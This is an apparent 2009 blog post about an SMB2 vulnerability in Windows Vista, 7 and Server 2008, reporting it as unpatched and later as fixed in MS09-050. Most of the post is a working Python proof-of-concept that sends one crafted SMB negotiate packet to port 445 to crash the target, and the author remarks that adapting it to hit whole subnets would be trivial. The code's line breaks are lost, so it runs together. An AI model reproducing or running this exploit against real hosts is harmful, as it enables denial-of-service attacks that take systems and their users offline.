As is normal for a Patch Tuesday, Microsoft released a bunch of patches. Unfortunately, none of them fix a vulnerability in SMB2 on Vista, 7, or Server 2008 which allows easy remote BSODs using a single packet. This code below, which works under Python 2.6 on Windows, was very slightly adapted from this post to Full Disclosure.
import sockethost = "127.0.0.1", 445buff = ("\x00\x00\x00\x90" # Begin SMB header: Session message"\xff\x53\x4d\x42" # Server Component: SMB"\x72\x00\x00\x00" # Negociate Protocol"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe""\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54""\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31""\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00""\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57""\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61""\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c""\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c""\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e""\x30\x30\x32\x00")s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect(host)s.send(buff)s.close()
UPDATE: Microsoft has posted 975497 – Vulnerabilities in SMB Could Allow Remote Code Execution which states:
Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.
I’m not sure how they define attack, but that BSOD above sure looks like one and making something quick to hit whole subnets in a go would be trivial.
UPDATE 2: This was fixed on 13-Oct-2009 in MS09-050.
Leave a Comment